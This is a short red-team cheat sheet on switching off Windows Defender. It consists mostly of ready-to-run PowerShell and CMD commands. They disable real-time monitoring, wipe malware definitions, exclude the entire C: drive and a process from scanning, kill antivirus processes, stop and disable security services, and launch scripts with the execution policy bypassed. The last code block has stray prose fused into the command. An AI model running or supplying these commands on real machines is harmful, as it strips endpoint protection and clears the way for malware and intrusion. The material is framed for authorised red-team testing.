# Bypassing Windows Defender for Red Teaming Activity

### **To disable real-time-protection Windows Defender**

Fire up a PowerShell window as administrator and run the following command:

```powershell
Set-MpPreference -DisableRealtimeMonitoring $true
```

### **At CMD to Disable Windows Defender and Reset it to Factory Default it will remove its all updated definitions.**

\*Admin rights are required

The command that needs to be executed:

```powershell
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All Set-MpPreference -DisableIOAVProtection $true
```

### **To add an Exception Directory and Process**

```powershell
Add-MpPreference -ExclusionPath "C:\"
Add-MpPreference -ExclusionProcess "c:\internal\test.exe"
```

Now if Defender comes back to life it will ignore C:\\ although it’s signatures will be updated.

### Terminate Anti-Virus Processes

```powershell
Taskkill /F /IM avprocess.exe
```

### Stop and Disable Anti-Virus Services

```powershell
net stop “service name”
```

### **To disable a Windows service**

```powershell
sc config "service name" start= disabled
```

### **Run Powershell ps1 script with Bypassing Execution Policy without opening Powershell Terminal using the shortcut**

Right-click on an empty area on your desktop and select Shortcut.   
Paste the following in the ‘Browse’ box but replace the ‘Path to script’ with the actual path to the script you created.  

```powershell
%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File "C:\Utilities\+Misc\tog.ps1"Once you’ve created the shortcut, right-click it and select the ‘Run as administrator’ option. When you run the shortcut as administrator, our ps1 script will be executed.
```